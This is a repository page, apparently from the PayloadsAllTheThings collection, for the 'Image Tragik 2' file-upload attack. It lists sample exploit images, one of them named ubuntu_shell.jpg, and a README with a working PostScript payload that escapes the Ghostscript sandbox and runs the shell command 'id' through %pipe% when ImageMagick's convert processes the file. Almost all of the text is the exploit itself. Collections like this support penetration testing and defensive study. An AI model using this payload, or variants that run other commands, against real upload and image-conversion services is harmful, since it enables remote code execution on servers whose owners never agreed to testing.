PayloadsAllTheThings/Upload insecure files/Image Tragik 2
Swissky 3522d9a674 Files JPEG -> JPG + Tag v2 2018-11-17 14:40:12 +01:00
..
README.md
centos_id.jpg Files JPEG -> JPG + Tag v2 2018-11-17 14:40:12 +01:00
ubuntu_id.jpg Files JPEG -> JPG + Tag v2 2018-11-17 14:40:12 +01:00
ubuntu_shell.jpg Files JPEG -> JPG + Tag v2 2018-11-17 14:40:12 +01:00

README.md

Image Tragik 2

Exploit

Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

then use convert shellexec.jpeg whatever.gif

Thanks to